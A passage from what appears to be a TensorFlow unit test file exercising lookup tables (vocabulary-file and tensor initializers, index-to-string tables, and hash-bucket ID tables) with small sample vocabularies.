self.assertRaises(
ValueError, lookup_ops.index_table_from_file, vocabulary_file=None)
def test_index_table_from_file_str_fails_with_zero_size_vocabulary(self):
vocabulary_file = self._createVocabFile("zero_vocab_str.txt")
self.assertRaisesRegexp(
ValueError,
"vocab_size must be greater than 0, got 0. "
"vocabulary_file: .*zero_vocab_str.txt",
lookup_ops.index_table_from_file,
vocabulary_file=vocabulary_file,
vocab_size=0)
def test_index_table_from_file_tensor_fails_with_zero_size_vocabulary(self):
vocabulary_file = constant_op.constant(
self._createVocabFile("zero_vocab_tensor.txt"))
self.assertRaisesRegexp(
ValueError,
"vocab_size must be greater than 0, got 0. "
"vocabulary_file: .*zero_vocab_tensor.txt",
lookup_ops.index_table_from_file,
vocabulary_file=vocabulary_file,
vocab_size=0)
def test_index_table_from_file_with_vocab_size_too_small(self):
vocabulary_file = self._createVocabFile("f2i_vocab6.txt")
with self.test_session():
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file, vocab_size=2)
ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((1, -1, -1), ids.eval())
self.assertEqual(2, table.size().eval())
def test_index_table_from_file_with_vocab_size_too_large(self):
vocabulary_file = self._createVocabFile("f2i_vocab7.txt")
with self.test_session():
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file, vocab_size=4)
self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Invalid vocab_size", table.init.run)
def test_index_table_from_file_with_vocab_size(self):
vocabulary_file = self._createVocabFile("f2i_vocab8.txt")
self.assertRaises(
ValueError,
lookup_ops.index_table_from_file,
vocabulary_file=vocabulary_file,
vocab_size=0)
with self.test_session():
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file, vocab_size=3)
ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((1, 2, -1), ids.eval())
self.assertEqual(3, table.size().eval())
def test_index_table_from_file_with_invalid_hashers(self):
vocabulary_file = self._createVocabFile("invalid_hasher.txt")
with self.test_session():
with self.assertRaises(TypeError):
lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file,
vocab_size=3,
num_oov_buckets=1,
hasher_spec=1)
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file,
vocab_size=3,
num_oov_buckets=1,
hasher_spec=lookup_ops.HasherSpec("my-awesome-hash", None))
self.assertRaises(ValueError, table.lookup,
constant_op.constant(["salad", "surgery", "tarkus"]))
def test_index_table_from_file_table_ref_with_oov_buckets(self):
vocabulary_file = self._createVocabFile("f2i_vocab9.txt")
with self.test_session():
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file, num_oov_buckets=1)
self.assertIsNotNone(table.table_ref)
def test_index_table_from_file_table_ref_without_oov_buckets(self):
vocabulary_file = self._createVocabFile("f2i_vocab10.txt")
with self.test_session():
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file, num_oov_buckets=0)
self.assertIsNotNone(table.table_ref)
class KeyValueTensorInitializerTest(test.TestCase):
def test_string(self):
with ops.Graph().as_default(), self.test_session():
init = lookup_ops.KeyValueTensorInitializer(
("brain", "salad", "surgery"), (0, 1, 2), dtypes.string, dtypes.int64)
table = lookup_ops.HashTable(init, default_value=-1)
table.init.run()
def test_int64(self):
with ops.Graph().as_default(), self.test_session():
init = lookup_ops.KeyValueTensorInitializer((42, 1, -1000), (0, 1, 2),
dtypes.int64, dtypes.int64)
table = lookup_ops.HashTable(init, default_value=-1)
table.init.run()
def test_int32(self):
with ops.Graph().as_default(), self.test_session():
init = lookup_ops.KeyValueTensorInitializer((42, 1, -1000), (0, 1, 2),
dtypes.int32, dtypes.int64)
table = lookup_ops.HashTable(init, default_value=-1)
with self.assertRaisesRegexp(
errors_impl.OpError, "No OpKernel was registered"):
table.init.run()
class IndexTableFromTensor(test.TestCase):
def test_index_table_from_tensor_with_tensor_init(self):
with self.test_session():
table = lookup_ops.index_table_from_tensor(
vocabulary_list=("brain", "salad", "surgery"), num_oov_buckets=1)
ids = table.lookup(constant_op.constant(("salad", "surgery", "tarkus")))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((1, 2, 3), ids.eval())
def test_int32_index_table_from_tensor_with_tensor_init(self):
with self.test_session():
table = lookup_ops.index_table_from_tensor(
vocabulary_list=(42, 1, -1000), num_oov_buckets=1, dtype=dtypes.int32)
ids = table.lookup(
constant_op.constant((1, -1000, 11), dtype=dtypes.int32))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((1, 2, 3), ids.eval())
def test_int64_index_table_from_tensor_with_tensor_init(self):
with self.test_session():
table = lookup_ops.index_table_from_tensor(
vocabulary_list=(42, 1, -1000), num_oov_buckets=1, dtype=dtypes.int64)
ids = table.lookup(
constant_op.constant((1, -1000, 11), dtype=dtypes.int64))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((1, 2, 3), ids.eval())
def test_index_table_from_tensor_with_default_value(self):
default_value = -42
with self.test_session():
table = lookup_ops.index_table_from_tensor(
vocabulary_list=["brain", "salad", "surgery"],
default_value=default_value)
ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((1, 2, default_value), ids.eval())
def test_index_table_from_tensor_missing_vocabulary_list(self):
with self.test_session():
with self.assertRaisesRegexp(ValueError,
"vocabulary_list must be specified"):
lookup_ops.index_table_from_tensor(
vocabulary_list=None, num_oov_buckets=1)
def test_index_table_from_tensor_empty_vocabulary_list(self):
with self.test_session():
table = lookup_ops.index_table_from_tensor(
vocabulary_list=np.array([], dtype=np.str_), num_oov_buckets=1)
ids = table.lookup(constant_op.constant(["salad", "surgery", "brain"]))
self.assertRaises(errors_impl.OpError, ids.eval)
with self.assertRaisesRegexp(
errors_impl.OpError, "keys and values cannot be empty"):
lookup_ops.tables_initializer().run()
def test_index_table_from_tensor_with_invalid_hashers(self):
with self.test_session():
with self.assertRaises(TypeError):
lookup_ops.index_table_from_tensor(
vocabulary_list=["brain", "salad", "surgery"],
num_oov_buckets=1,
hasher_spec=1)
table = lookup_ops.index_table_from_tensor(
vocabulary_list=["brain", "salad", "surgery"],
num_oov_buckets=1,
hasher_spec=lookup_ops.HasherSpec("my-awesome-hash", None))
self.assertRaises(ValueError, table.lookup,
constant_op.constant(["salad", "surgery", "tarkus"]))
class IndexToStringTableFromFileTest(test.TestCase):
def _createVocabFile(self, basename, values=("brain", "salad", "surgery")):
vocabulary_file = os.path.join(self.get_temp_dir(), basename)
with open(vocabulary_file, "w") as f:
f.write("\n".join(values) + "\n")
return vocabulary_file
def test_index_to_string_table(self):
vocabulary_file = self._createVocabFile("i2f_vocab1.txt")
with self.test_session():
table = lookup_ops.index_to_string_table_from_file(
vocabulary_file=vocabulary_file)
features = table.lookup(constant_op.constant([0, 1, 2, 3], dtypes.int64))
self.assertRaises(errors_impl.OpError, features.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((b"brain", b"salad", b"surgery", b"UNK"),
features.eval())
def test_index_to_string_table_from_multicolumn_file(self):
vocabulary_file = self._createVocabFile(
"f2i_vocab1.txt", values=("brain\t300", "salad\t20", "surgery\t1"))
with self.test_session():
table = lookup_ops.index_to_string_table_from_file(
vocabulary_file=vocabulary_file,
key_column_index=lookup_ops.TextFileIndex.LINE_NUMBER,
value_column_index=0)
features = table.lookup(constant_op.constant([0, 1, 2, 3], dtypes.int64))
self.assertRaises(errors_impl.OpError, features.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((b"brain", b"salad", b"surgery", b"UNK"),
features.eval())
def test_index_to_string_table_from_multicolumn_file_custom_delimiter(self):
vocabulary_file = self._createVocabFile(
"f2i_vocab1.txt", values=("brain 300", "salad 20", "surgery 1"))
with self.test_session():
table = lookup_ops.index_to_string_table_from_file(
vocabulary_file=vocabulary_file,
key_column_index=lookup_ops.TextFileIndex.LINE_NUMBER,
value_column_index=0,
delimiter=" ")
features = table.lookup(constant_op.constant([0, 1, 2, 3], dtypes.int64))
self.assertRaises(errors_impl.OpError, features.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((b"brain", b"salad", b"surgery", b"UNK"),
features.eval())
def test_index_to_string_table_with_default_value(self):
default_value = b"NONE"
vocabulary_file = self._createVocabFile("f2i_vocab2.txt")
with self.test_session():
table = lookup_ops.index_to_string_table_from_file(
vocabulary_file=vocabulary_file, default_value=default_value)
features = table.lookup(constant_op.constant([1, 2, 4], dtypes.int64))
self.assertRaises(errors_impl.OpError, features.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((b"salad", b"surgery", default_value),
features.eval())
def test_index_to_string_table_with_vocab_size_too_small(self):
default_value = b"NONE"
vocabulary_file = self._createVocabFile("f2i_vocab2.txt")
with self.test_session():
table = lookup_ops.index_to_string_table_from_file(
vocabulary_file=vocabulary_file,
vocab_size=2,
default_value=default_value)
features = table.lookup(constant_op.constant([1, 2, 4], dtypes.int64))
self.assertRaises(errors_impl.OpError, features.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((b"salad", default_value, default_value),
features.eval())
def test_index_to_string_table_with_vocab_size_too_large(self):
vocabulary_file = self._createVocabFile("f2i_vocab6.txt")
with self.test_session():
table = lookup_ops.index_to_string_table_from_file(
vocabulary_file=vocabulary_file, vocab_size=4)
features = table.lookup(constant_op.constant([1, 2, 4], dtypes.int64))
self.assertRaises(errors_impl.OpError, features.eval)
init = lookup_ops.tables_initializer()
self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Invalid vocab_size", init.run)
def test_index_to_string_table_with_vocab_size(self):
vocabulary_file = self._createVocabFile("f2i_vocab7.txt")
with self.test_session():
table = lookup_ops.index_to_string_table_from_file(
vocabulary_file=vocabulary_file, vocab_size=3)
features = table.lookup(constant_op.constant([1, 2, 4], dtypes.int64))
self.assertRaises(errors_impl.OpError, features.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((b"salad", b"surgery", b"UNK"), features.eval())
class IndexToStringTableFromTensorTest(test.TestCase):
def test_index_to_string_table_from_tensor(self):
with self.test_session():
vocabulary_list = constant_op.constant(["brain", "salad", "surgery"])
table = lookup_ops.index_to_string_table_from_tensor(
vocabulary_list=vocabulary_list)
indices = constant_op.constant([0, 1, 2, 3], dtypes.int64)
features = table.lookup(indices)
self.assertRaises(errors_impl.OpError, features.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((b"brain", b"salad", b"surgery", b"UNK"),
features.eval())
def test_duplicate_entries(self):
with self.test_session():
vocabulary_list = constant_op.constant(["hello", "hello"])
table = lookup_ops.index_to_string_table_from_tensor(
vocabulary_list=vocabulary_list)
indices = constant_op.constant([0, 1, 4], dtypes.int64)
features = table.lookup(indices)
lookup_ops.tables_initializer().run()
self.assertAllEqual((b"hello", b"hello", b"UNK"), features.eval())
def test_index_to_string_with_default_value(self):
default_value = b"NONE"
with self.test_session():
vocabulary_list = constant_op.constant(["brain", "salad", "surgery"])
table = lookup_ops.index_to_string_table_from_tensor(
vocabulary_list=vocabulary_list, default_value=default_value)
indices = constant_op.constant([1, 2, 4], dtypes.int64)
features = table.lookup(indices)
self.assertRaises(errors_impl.OpError, features.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((b"salad", b"surgery", default_value),
features.eval())
class InitializeTableFromFileOpTest(test.TestCase):
def _createVocabFile(self, basename, values=("brain", "salad", "surgery")):
vocabulary_file = os.path.join(self.get_temp_dir(), basename)
with open(vocabulary_file, "w") as f:
f.write("\n".join(values) + "\n")
return vocabulary_file
def testInitializeStringTable(self):
vocabulary_file = self._createVocabFile("one_column_1.txt")
with self.test_session():
default_value = -1
table = lookup_ops.HashTable(
lookup_ops.TextFileInitializer(
vocabulary_file, dtypes.string,
lookup_ops.TextFileIndex.WHOLE_LINE, dtypes.int64,
lookup_ops.TextFileIndex.LINE_NUMBER), default_value)
table.init.run()
output = table.lookup(constant_op.constant(["brain", "salad", "tank"]))
result = output.eval()
self.assertAllEqual([0, 1, -1], result)
def testInitializeInt64Table(self):
vocabulary_file = self._createVocabFile(
"one_column_int64.txt", values=("42", "1", "-1000"))
with self.test_session():
default_value = -1
table = lookup_ops.HashTable(
lookup_ops.TextFileInitializer(
vocabulary_file, dtypes.int64,
lookup_ops.TextFileIndex.WHOLE_LINE, dtypes.int64,
lookup_ops.TextFileIndex.LINE_NUMBER), default_value)
table.init.run()
output = table.lookup(
constant_op.constant((42, 1, 11), dtype=dtypes.int64))
result = output.eval()
self.assertAllEqual([0, 1, -1], result)
def testInitializeIndexTable(self):
vocabulary_file = self._createVocabFile("one_column_2.txt")
with self.test_session():
default_value = "UNK"
key_index = lookup_ops.TextFileIndex.LINE_NUMBER
value_index = lookup_ops.TextFileIndex.WHOLE_LINE
table = lookup_ops.HashTable(
lookup_ops.TextFileInitializer(vocabulary_file, dtypes.int64,
key_index, dtypes.string, value_index),
default_value)
table.init.run()
input_values = constant_op.constant([0, 1, 2, 3], dtypes.int64)
output = table.lookup(input_values)
result = output.eval()
self.assertAllEqual([b"brain", b"salad", b"surgery", b"UNK"], result)
def testMultiColumn(self):
vocabulary_file = os.path.join(self.get_temp_dir(), "three_columns.txt")
with open(vocabulary_file, "w") as f:
f.write("\n".join(["0\tbrain\t1", "1\tsalad\t5", "2\tsurgery\t6"]) + "\n")
with self.test_session():
default_value = -1
key_index = 1
value_index = 2
table = lookup_ops.HashTable(
lookup_ops.TextFileInitializer(vocabulary_file, dtypes.string,
key_index, dtypes.int64, value_index),
default_value)
table.init.run()
input_string = constant_op.constant(["brain", "salad", "surgery"])
output = table.lookup(input_string)
result = output.eval()
self.assertAllEqual([1, 5, 6], result)
def testInvalidDataTypeInMultiColumn(self):
vocabulary_file = os.path.join(self.get_temp_dir(), "three_columns.txt")
with open(vocabulary_file, "w") as f:
f.write("\n".join(["0\tbrain\t1", "1\tsalad\t5", "2\tsurgery\t6"]) + "\n")
with self.test_session():
default_value = -1
key_index = 2
value_index = 1
table = lookup_ops.HashTable(
lookup_ops.TextFileInitializer(vocabulary_file, dtypes.string,
key_index, dtypes.int64, value_index),
default_value)
with self.assertRaisesOpError("is not a valid"):
table.init.run()
def testInvalidDataType(self):
vocabulary_file = self._createVocabFile("one_column_3.txt")
with self.test_session():
default_value = "UNK"
key_index = lookup_ops.TextFileIndex.WHOLE_LINE
value_index = lookup_ops.TextFileIndex.LINE_NUMBER
with self.assertRaises(ValueError):
lookup_ops.HashTable(
lookup_ops.TextFileInitializer(vocabulary_file, dtypes.int64,
key_index, dtypes.string,
value_index), default_value)
def testInvalidIndex(self):
vocabulary_file = self._createVocabFile("one_column_4.txt")
with self.test_session():
default_value = -1
key_index = 1 # second column of the line
value_index = lookup_ops.TextFileIndex.LINE_NUMBER
table = lookup_ops.HashTable(
lookup_ops.TextFileInitializer(vocabulary_file, dtypes.string,
key_index, dtypes.int64, value_index),
default_value)
with self.assertRaisesOpError("Invalid number of columns"):
table.init.run()
def testInitializeSameTableWithMultipleNodes(self):
vocabulary_file = self._createVocabFile("one_column_5.txt")
with self.test_session() as sess:
shared_name = "shared-one-columm"
default_value = -1
table1 = lookup_ops.HashTable(
lookup_ops.TextFileInitializer(vocabulary_file, dtypes.string,
lookup_ops.TextFileIndex.WHOLE_LINE,
dtypes.int64,
lookup_ops.TextFileIndex.LINE_NUMBER),
default_value,
shared_name=shared_name)
table2 = lookup_ops.HashTable(
lookup_ops.TextFileInitializer(vocabulary_file, dtypes.string,
lookup_ops.TextFileIndex.WHOLE_LINE,
dtypes.int64,
lookup_ops.TextFileIndex.LINE_NUMBER),
default_value,
shared_name=shared_name)
table3 = lookup_ops.HashTable(
lookup_ops.TextFileInitializer(vocabulary_file, dtypes.string,
lookup_ops.TextFileIndex.WHOLE_LINE,
dtypes.int64,
lookup_ops.TextFileIndex.LINE_NUMBER),
default_value,
shared_name=shared_name)
lookup_ops.tables_initializer().run()
input_string = constant_op.constant(["brain", "salad", "tank"])
output1 = table1.lookup(input_string)
output2 = table2.lookup(input_string)
output3 = table3.lookup(input_string)
out1, out2, out3 = sess.run([output1, output2, output3])
self.assertAllEqual([0, 1, -1], out1)
self.assertAllEqual([0, 1, -1], out2)
self.assertAllEqual([0, 1, -1], out3)
def testInitializeTableWithNoFilename(self):
with self.test_session():
default_value = -1
with self.assertRaises(ValueError):
lookup_ops.HashTable(
lookup_ops.TextFileInitializer(
"", dtypes.string, lookup_ops.TextFileIndex.WHOLE_LINE,
dtypes.int64, lookup_ops.TextFileIndex.LINE_NUMBER),
default_value)
def testInitializeWithVocabSize(self):
with self.test_session():
default_value = -1
vocab_size = 3
vocabulary_file1 = self._createVocabFile("one_column6.txt")
table1 = lookup_ops.HashTable(
lookup_ops.TextFileInitializer(
vocabulary_file1,
dtypes.string,
lookup_ops.TextFileIndex.WHOLE_LINE,
dtypes.int64,
lookup_ops.TextFileIndex.LINE_NUMBER,
vocab_size=vocab_size), default_value)
# Initialize from file.
table1.init.run()
self.assertEquals(vocab_size, table1.size().eval())
vocabulary_file2 = self._createVocabFile("one_column7.txt")
vocab_size = 5
table2 = lookup_ops.HashTable(
lookup_ops.TextFileInitializer(
vocabulary_file2,
dtypes.string,
lookup_ops.TextFileIndex.WHOLE_LINE,
dtypes.int64,
lookup_ops.TextFileIndex.LINE_NUMBER,
vocab_size=vocab_size), default_value)
with self.assertRaisesOpError("Invalid vocab_size"):
table2.init.run()
vocab_size = 1
vocabulary_file3 = self._createVocabFile("one_column3.txt")
table3 = lookup_ops.HashTable(
lookup_ops.TextFileInitializer(
vocabulary_file3,
dtypes.string,
lookup_ops.TextFileIndex.WHOLE_LINE,
dtypes.int64,
lookup_ops.TextFileIndex.LINE_NUMBER,
vocab_size=vocab_size), default_value)
# Smaller vocab size reads only vocab_size records.
table3.init.run()
self.assertEquals(vocab_size, table3.size().eval())
def testFeedVocabularyName(self):
vocabulary_file = self._createVocabFile("feed_vocabulary.txt")
with self.test_session():
default_value = -1
table = lookup_ops.HashTable(
lookup_ops.TextFileInitializer(
"old_file.txt", dtypes.string,
lookup_ops.TextFileIndex.WHOLE_LINE, dtypes.int64,
lookup_ops.TextFileIndex.LINE_NUMBER), default_value)
# Initialize with non existing file (old_file.txt) should fail.
# TODO(yleon): Update message, which might change per FileSystem.
with self.assertRaisesOpError("old_file.txt"):
table.init.run()
# Initialize the model feeding the vocabulary file.
filenames = ops.get_collection(ops.GraphKeys.ASSET_FILEPATHS)
table.init.run(feed_dict={filenames[0]: vocabulary_file})
input_string = constant_op.constant(["brain", "salad", "tank"])
output = table.lookup(input_string)
result = output.eval()
self.assertAllEqual([0, 1, -1], result)
def testInvalidFilenames(self):
vocabulary_file = self._createVocabFile("filename_shape.txt")
with self.test_session():
default_value = -1
# Invalid data type
other_type = constant_op.constant(1)
with self.assertRaises(ValueError):
lookup_ops.HashTable(
lookup_ops.TextFileInitializer(
other_type, dtypes.string, lookup_ops.TextFileIndex.WHOLE_LINE,
dtypes.int64, lookup_ops.TextFileIndex.LINE_NUMBER),
default_value)
# Non-scalar filename
filenames = constant_op.constant([vocabulary_file, vocabulary_file])
with self.assertRaises(ValueError):
lookup_ops.HashTable(
lookup_ops.TextFileInitializer(
filenames, dtypes.string, lookup_ops.TextFileIndex.WHOLE_LINE,
dtypes.int64, lookup_ops.TextFileIndex.LINE_NUMBER),
default_value)
def testIdToStringTable(self):
vocab_file = self._createVocabFile("feat_to_id_1.txt")
with self.test_session():
default_value = "UNK"
vocab_size = 3
table = lookup_ops.HashTable(
lookup_ops.TextFileStringTableInitializer(
vocab_file, vocab_size=vocab_size), default_value)
table.init.run()
input_values = constant_op.constant([0, 1, 2, 3], dtypes.int64)
out = table.lookup(input_values)
self.assertAllEqual([b"brain", b"salad", b"surgery", b"UNK"], out.eval())
self.assertEquals(vocab_size, table.size().eval())
def testStringToIdTable(self):
vocab_file = self._createVocabFile("feat_to_id_2.txt")
with self.test_session():
default_value = -1
vocab_size = 3
table = lookup_ops.HashTable(
lookup_ops.TextFileIdTableInitializer(
vocab_file, vocab_size=vocab_size), default_value)
table.init.run()
input_string = constant_op.constant(["brain", "salad", "surgery", "UNK"])
out = table.lookup(input_string)
self.assertAllEqual([0, 1, 2, -1], out.eval())
self.assertEquals(vocab_size, table.size().eval())
def testInt64ToIdTable(self):
vocab_file = self._createVocabFile(
"feat_to_id_3.txt", values=("42", "1", "-1000"))
with self.test_session():
default_value = -1
vocab_size = 3
table = lookup_ops.HashTable(
lookup_ops.TextFileIdTableInitializer(
vocab_file, vocab_size=vocab_size, key_dtype=dtypes.int64),
default_value)
table.init.run()
out = table.lookup(
constant_op.constant((42, 1, -1000, 11), dtype=dtypes.int64))
self.assertAllEqual((0, 1, 2, -1), out.eval())
self.assertEquals(vocab_size, table.size().eval())
class IdTableWithHashBucketsTest(test.TestCase):
def _createVocabFile(self, basename, values=("brain", "salad", "surgery")):
vocabulary_file = os.path.join(self.get_temp_dir(), basename)
with open(vocabulary_file, "w") as f:
f.write("\n".join(values) + "\n")
return vocabulary_file
def testStringIdTableWithHashBuckets(self):
vocab_file = self._createVocabFile("feat_to_id_1.txt")
with self.test_session():
default_value = -1
vocab_size = 3
oov_buckets = 1
table = lookup_ops.IdTableWithHashBuckets(
lookup_ops.HashTable(
lookup_ops.TextFileIdTableInitializer(
vocab_file, vocab_size=vocab_size), default_value),
oov_buckets)
table.init.run()
input_string = constant_op.constant(["brain", "salad", "surgery", "UNK"])
out = table.lookup(input_string)
self.assertAllEqual([0, 1, 2, 3], out.eval())
self.assertEquals(vocab_size + oov_buckets, table.size().eval())
def testInt32IdTableWithHashBuckets(self):
vocab_file = self._createVocabFile("feat_to_id_2.txt", ("42", "1", "-1000"))
with self.test_session():
default_value = -1
vocab_size = 3
oov_buckets = 1
table = lookup_ops.IdTableWithHashBuckets(
lookup_ops.HashTable(
lookup_ops.TextFileIdTableInitializer(
vocab_file, vocab_size=vocab_size, key_dtype=dtypes.int64),
default_value),
oov_buckets,
key_dtype=dtypes.int32)
table.init.run()
values = constant_op.constant((42, 1, -1000, 11), dtype=dtypes.int32)
out = table.lookup(values)
self.assertAllEqual([0, 1, 2, 3], out.eval())
self.assertEquals(vocab_size + oov_buckets, table.size().eval())
def testInt64IdTableWithHashBuckets(self):
vocab_file = self._createVocabFile("feat_to_id_3.txt", ("42", "1", "-1000"))
with self.test_session():
default_value = -1
vocab_size = 3
oov_buckets = 1
table = lookup_ops.IdTableWithHashBuckets(
lookup_ops.HashTable(
lookup_ops.TextFileIdTableInitializer(
vocab_file, vocab_size=vocab_size, key_dtype=dtypes.int64),
default_value), oov_buckets)
table.init.run()
values = constant_op.constant((42, 1, -1000, 11), dtype=dtypes.int64)
out = table.lookup(values)
self.assertAllEqual([0, 1, 2, 3], out.eval())
self.assertEquals(vocab_size + oov_buckets, table.size().eval())
def testStringIdTableWithOnlyHashBucket(self):
with self.test_session():
oov_buckets = 5
# Set a table that only uses hash buckets, for each input value returns
# an id calculated by fingerprint("input") mod oov_buckets.
table = lookup_ops.IdTableWithHashBuckets(None, oov_buckets)
table.init.run()
values = constant_op.constant(("brain", "salad", "surgery"))
out = table.lookup(values)
self.assertAllEqual(
[
3, # fingerprint("brain") mod 5.
1, # fingerprint("salad") mod 5.
4 # fingerprint("surgery") mod 5
],
out.eval())
self.assertEquals(oov_buckets, table.size().eval())
def testInt32IdTableWithOnlyHashBucket(self):
with self.test_session():
oov_buckets = 5
# Set a table that only uses hash buckets, for each input value returns
# an id calculated by fingerprint("input") mod oov_buckets.
table = lookup_ops.IdTableWithHashBuckets(
None, oov_buckets, key_dtype=dtypes.int32)
table.init.run()
input_string = constant_op.constant([42, 1, -1000], dtype=dtypes.int32)
out = table.lookup(input_string)
self.assertAllEqual(
[
1, # fingerprint("42") mod 5.
4, # fingerprint("1") mod 5.
2 # fingerprint("-1000") mod 5
],
out.eval())
self.assertEquals(oov_buckets, table.size().eval())
def testFloat64IdTableWithOnlyHashBucket(self):
with self.test_session():
with self.assertRaisesRegexp(TypeError, "Invalid key_dtype"):
lookup_ops.IdTableWithHashBuckets(
None, num_oov_buckets=5, key_dtype=dtypes.float64)
def testBoolIdTableWithOnlyHashBucket(self):
with self.test_session():
with self.assertRaisesRegexp(TypeError, "Invalid key_dtype"):
lookup_ops.IdTableWithHashBuckets(
None, num_oov_buckets=5, key_dtype=dtypes.bool)
def testIdTableWithHashBucketsWithMultipleInitializers(self):
vocab_file = self._createVocabFile("feat_to_id_4.txt")
with self.test_session() as sess:
default_value = -1
vocab_size = 3
oov_buckets = 3
vocab_table = lookup_ops.HashTable(
lookup_ops.TextFileIdTableInitializer(
vocab_file, vocab_size=vocab_size), default_value)
table1 = lookup_ops.IdTableWithHashBuckets(
vocab_table,
oov_buckets,
hasher_spec=lookup_ops.FastHashSpec,
name="table1")
table2 = lookup_ops.IdTableWithHashBuckets(
vocab_table,
oov_buckets,
hasher_spec=lookup_ops.StrongHashSpec((1, 2)),
name="table2")
lookup_ops.tables_initializer().run()
input_string = constant_op.constant(
["fruit", "brain", "salad", "surgery", "UNK"])
out1 = table1.lookup(input_string)
out2 = table2.lookup(input_string)
out1, out2 = sess.run([out1, out2])
self.assertAllEqual([5, 0, 1, 2, 5], out1)
self.assertAllEqual([5, 0, 1, 2, 3], out2)
self.assertEquals(vocab_size + oov_buckets, table1.size().eval())
self.assertEquals(vocab_size + oov_buckets, table2.size().eval())
test_util.assert_ops_in_graph({
"table1_Lookup/hash_bucket": "StringToHashBucketFast",
"table2_Lookup/hash_bucket": "StringToHashBucketStrong",
}, sess.graph)
def testIdTableWithHashBucketsInitializationAcrossSessions(self):
vocab_file = self._createVocabFile("feat_to_id_5.txt")
shared_name = "across-sessions"
with self.test_session():
default_value = -1
vocab_size = 3
oov_buckets = 1
table1 = lookup_ops.IdTableWithHashBuckets(
lookup_ops.HashTable(
lookup_ops.TextFileIdTableInitializer(
vocab_file, vocab_size=vocab_size),
default_value,
shared_name=shared_name), oov_buckets)
table1.init.run()
input_string_1 = constant_op.constant(
["brain", "salad", "surgery", "UNK"])
out1 = table1.lookup(input_string_1)
self.assertAllEqual([0, 1, 2, 3], out1.eval())
self.assertEquals(vocab_size + oov_buckets, table1.size().eval())
with self.test_session():
default_value = -1
vocab_size = 3
oov_buckets = 1
# Underlying lookup table already initialized in previous session.
# No need to call table2.init.run()
table2 = lookup_ops.IdTableWithHashBuckets(
lookup_ops.HashTable(
lookup_ops.TextFileIdTableInitializer(
vocab_file, vocab_size=vocab_size),
default_value,
shared_name=shared_name), oov_buckets)
input_string_2 = constant_op.constant(["fruit", "salad", "UNK"])
out2 = table2.lookup(input_string_2)
self.assertAllEqual([3, 1, 3], out2.eval())
self.assertEquals(vocab_size + oov_buckets, table2.size().eval())
def testIdTableWithHashBucketsWithMultipleInitializersDifferentDefault(self):
vocab_file = self._createVocabFile("feat_to_id_6.txt")
with self.test_session() as sess:
default_value1 = -1
vocab_size = 3
oov_buckets = 0
table1 = lookup_ops.IdTableWithHashBuckets(
lookup_ops.HashTable(
lookup_ops.TextFileIdTableInitializer(
vocab_file, vocab_size=vocab_size), default_value1),
oov_buckets)
default_value2 = -2
table2 = lookup_ops.IdTableWithHashBuckets(
lookup_ops.HashTable(
lookup_ops.TextFileIdTableInitializer(
vocab_file, vocab_size=vocab_size), default_value2),
oov_buckets)
lookup_ops.tables_initializer().run()
input_string_1 = constant_op.constant(
["brain", "salad", "surgery", "UNK"])
input_string_2 = constant_op.constant(["fruit", "salad", "UNK"])
out1 = table1.lookup(input_string_1)
out2 = table2.lookup(input_string_2)
out1, out2 = sess.run([out1, out2])
self.assertAllEqual([0, 1, 2, -1], out1)
self.assertAllEqual([-2, 1, -2], out2)
self.assertEquals(vocab_size + oov_buckets, table1.size().eval())
self.assertEquals(vocab_size + oov_buckets, table2.size().eval())
def testSparseTensor(self):
vocab_file = self._createVocabFile("feat_to_id_7.txt")
input_indices = [[0, 0], [0, 1], [2, 0], [2, 2], [3, 0]]
input_shape = [4, 4]
with self.test_session() as sess:
sp_features = sparse_tensor.SparseTensor(
constant_op.constant(input_indices, dtypes.int64),
constant_op.constant(["brain", "salad", "brain", "surgery", "tarkus"],
dtypes.string),
constant_op.constant(input_shape, dtypes.int64))
table = lookup_ops.IdTableWithHashBuckets(
lookup_ops.HashTable(
lookup_ops.TextFileIdTableInitializer(vocab_file, vocab_size=3),
-1), 1)
table.init.run()
sp_ids = table.lookup(sp_features)
self.assertAllEqual([5], sp_ids.values._shape_as_list())
sp_ids_ind, sp_ids_val, sp_ids_shape = sess.run(
[sp_ids.indices, sp_ids.values, sp_ids.dense_shape])
self.assertAllEqual(input_indices, sp_ids_ind)
self.assertAllEqual([0, 1, 0, 2, 3], sp_ids_val)
self.assertAllEqual(input_shape, sp_ids_shape)
def testInt32SparseTensor(self):
input_indices = [[0, 0], [0, 1], [2, 0], [2, 2], [3, 0]]
input_shape = [4, 4]
with self.test_session() as sess:
sp_features = sparse_tensor.SparseTensor(
constant_op.constant(input_indices, dtypes.int64),
constant_op.constant([42, 1, 42, -1000, 11], dtypes.int32),
constant_op.constant(input_shape, dtypes.int64))
table = lookup_ops.IdTableWithHashBuckets(
lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(
(42, 1, -1000), (0, 1, 2), dtypes.int64, dtypes.int64), -1),
1,
key_dtype=dtypes.int32)
table.init.run()
sp_ids = table.lookup(sp_features)
